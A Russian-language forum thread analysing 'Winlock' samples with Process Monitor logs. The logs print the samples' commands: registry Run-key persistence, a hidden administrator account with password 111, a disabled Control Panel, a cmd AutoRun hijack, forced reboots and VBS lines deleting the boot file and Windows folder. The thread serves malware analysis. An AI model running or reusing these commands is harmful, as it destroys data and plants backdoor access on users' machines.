0
0eck
Гость
И этот в довесок
Winlock
Pass: 111
Winlock
Pass: 111
Вы должны зарегистрироваться, чтобы увидеть внешние ссылки
Вот еще файл, протестируй если есть свободное время!
И этот в довесок
Дальше он через CMD запустил сам себя, извращенец.Date & Time: 29.05.2013 21:30:27
Event Class: File System
Operation: CreateFile
Result: SUCCESS
Path: C:\Users\Freelncr\AppData\Local\Temp\B7AA.tmp\opera.bat
TID: 3632
Duration: 0.0000918
Desired Access: Generic Read/Write
Disposition: OverwriteIf
Options: Synchronous IO Non-Alert, Non-Directory File
Attributes: N
ShareMode: Read
AllocationSize: 0
OpenResult: Created
Следующий шаг - безуспешная попытка скопировать себя в windows\system32Date & Time: 29.05.2013 21:30:28
Event Class: Process
Operation: Process Create
Result: SUCCESS
Path: C:\Windows\system32\cmd.exe
TID: 3632
Duration: 0.0000000
PID: 3672
Command line: cmd /c ""C:\Users\Freelncr\AppData\Local\Temp\B7AA.tmp\opera.bat""
Далее он с помощью утилиты reg добавил себя в автозагрузку HKLMDate & Time: 29.05.2013 21:30:28
Event Class: File System
Operation: CreateFile
Result: ACCESS DENIED
Path: C:\Windows\System32\File.bat
TID: 3676
Duration: 0.0001202
Desired Access: Generic Write, Read Data/List Directory, Read Attributes, Delete
Disposition: OverwriteIf
Options: Sequential Access, Non-Directory File
Attributes: ANCI
ShareMode: None
AllocationSize: 0
Далее идет попытка отключить панель управления. FailDate & Time: 29.05.2013 21:30:28
Event Class: Process
Operation: Process Create
Result: SUCCESS
Path: C:\Windows\system32\reg.exe
TID: 3676
Duration: 0.0000000
PID: 3668
Command line: reg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "Filel" /t REG_SZ /d "C:\Windows\system32\File.bat" /f
Date & Time: 29.05.2013 21:30:28
Event Class: Process
Operation: Process Create
Result: SUCCESS
Path: C:\Windows\system32\reg.exe
TID: 3676
Duration: 0.0000000
PID: 2472
Command line: reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoControlPanel /t REG_DWORD /d 1 /f
Date & Time: 29.05.2013 21:30:28
Event Class: Registry
Operation: RegCreateKey
Result: ACCESS DENIED
Path: HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer
TID: 3792
Duration: 0.0000139
Desired Access: Read/Write
Далее вирус удаляет support юзера. FailDate & Time: 29.05.2013 21:30:28
Event Class: Process
Operation: Process Start
Result: SUCCESS
Path:
TID: 3676
Duration: 0.0000000
Parent PID: 3672
Command line: chcp 1251
Current directory: C:\Users\Freelncr\Desktop\
И дальше начинается полная порнография. Вирус добавляет пользователя "Писька" с паролем 111. FailDate & Time: 29.05.2013 21:30:28
Event Class: Process
Operation: Process Create
Result: SUCCESS
Path: C:\Windows\system32\net.exe
TID: 3676
Duration: 0.0000000
PID: 3024
Command line: net user SUPPORT_388945a0 /delete
Далее вирус добавляет письку в администраторы, гы гы гы. FailDate & Time: 29.05.2013 21:30:28
Event Class: Process
Operation: Process Start
Result: SUCCESS
Path:
TID: 3676
Duration: 0.0000000
Parent PID: 3672
Command line: net user писька 111 /add
Удаляет support из пользователей, неуспешно.Date & Time: 29.05.2013 21:30:28
Event Class: Process
Operation: Process Create
Result: SUCCESS
Path: C:\Windows\system32\net.exe
TID: 3676
Duration: 0.0000000
PID: 3772
Command line: net localgroup Администраторы писька /add
Date & Time: 29.05.2013 21:30:28
Event Class: Process
Operation: Process Create
Result: SUCCESS
Path: C:\Windows\system32\net.exe
TID: 3676
Duration: 0.0000000
PID: 3748
Command line: net localgroup Пользователи SUPPORT_388945a0 /del
Date & Time: 29.05.2013 21:30:28
Event Class: File System
Operation: CreateFile
Result: ACCESS DENIED
Path: C:\Windows\System32\batinit.bat
TID: 3676
Duration: 0.0000398
Desired Access: Generic Write, Read Data/List Directory, Read Attributes, Delete
Disposition: OverwriteIf
Options: Sequential Access, Non-Directory File
Attributes: ANCI
ShareMode: None
AllocationSize: 0
Event Class: Process
Operation: Process Create
Result: SUCCESS
Path: C:\Windows\system32\reg.exe
TID: 3676
Duration: 0.0000000
PID: 2264
Command line: reg add "HKCU\SOFTWARE\Microsoft\Command Processor" /v AutoRun /t REG_SZ /d "C:\Windows\syste m32\batinit.bat" /f
Date & Time: 29.05.2013 21:30:29
Event Class: Process
Operation: Process Create
Result: SUCCESS
Path: C:\Windows\system32\shutdown.exe
TID: 3676
Duration: 0.0000000
PID: 2832
Command line: shutdown -r -t 1 -c "lol"
Вот еще файл, протестируй если есть свободное время!
Winlock
Pass: 111
***Скрытый текст***
Date & Time: 22.06.2013 14:39:16
Event Class: File System
Operation: IRP_MJ_CREATE
Result: SUCCESS
Path: C:\Users\Freelncr\AppData\Local\Temp\7AFC.tmp
TID: 3416
Duration: 0.0306462
Desired Access: Generic Read
Disposition: Create
Options: Synchronous IO Non-Alert, Non-Directory File
Attributes: N
ShareMode: None
AllocationSize: 0
OpenResult: Created
Date & Time: 22.06.2013 14:39:16
Event Class: File System
Operation: IRP_MJ_CREATE
Result: SUCCESS
Path: C:\Users\Freelncr\AppData\Local\Temp\7AFC.tmp\picassa.bat
TID: 3416
Duration: 0.0005353
Desired Access: Generic Read/Write
Disposition: OverwriteIf
Options: Synchronous IO Non-Alert, Non-Directory File
Attributes: N
ShareMode: Read
AllocationSize: 0
OpenResult: Created
Содержимое temp(1)(2).vbsDate & Time: 22.06.2013 14:39:16
Event Class: File System
Operation: IRP_MJ_CREATE
Result: SUCCESS
Path: C:\Users\Freelncr\AppData\Local\Temp\temp1.vbs
TID: 3848
Duration: 0.0002271
Desired Access: Generic Write, Read Attributes
Disposition: OverwriteIf
Options: Synchronous IO Non-Alert, Non-Directory File
Attributes: N
ShareMode: Read
AllocationSize: 0
OpenResult: Created
Разбирать дальнешие шаги я не буду, ибо это займет слишком много времени, ограничусь кратким разбором.fso.deletefile "C:\ntldr",1
fso.deletefolder "D:\Windows",1
Date & Time: 22.06.2013 14:39:17
Event Class: Registry
Operation: RegSetValue
Result: SUCCESS
Path: HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\RunExplorer32
TID: 3052
Duration: 0.0007715
Type: REG_SZ
Length: 50
Data: C:\Windows\user32dll.bat
Date & Time: 22.06.2013 14:39:19
Event Class: Process
Operation: Process Create
Result: SUCCESS
Path: C:\Windows\system32\reg.exe
TID: 3848
Duration: 0.0000000
PID: 3816
Command line: reg add "hklm\Software\Microsoft\Windows\CurrentVersion\run" /v SwapNT /t REG_SZ /d rundll32 user32, SwapMouseButton /f
Резюме - это не вирус, а так развлекательная программка, хотя вреда может нанести немало.Date & Time: 22.06.2013 14:39:20
Event Class: Process
Operation: Process Create
Result: SUCCESS
Path: C:\Windows\system32\shutdown.exe
TID: 3848
Duration: 0.0000000
PID: 3552
Command line: shutdown -r -t 1 -c "lol"
Автор темы | Похожие темы | Форум | Ответы | Дата |
---|---|---|---|---|
Информация Анализ шифровальщика Wana Decrypt0r 2.0 | Обзоры новых вирусов | 0 |
Похожие темы |
---|
Информация Анализ шифровальщика Wana Decrypt0r 2.0 |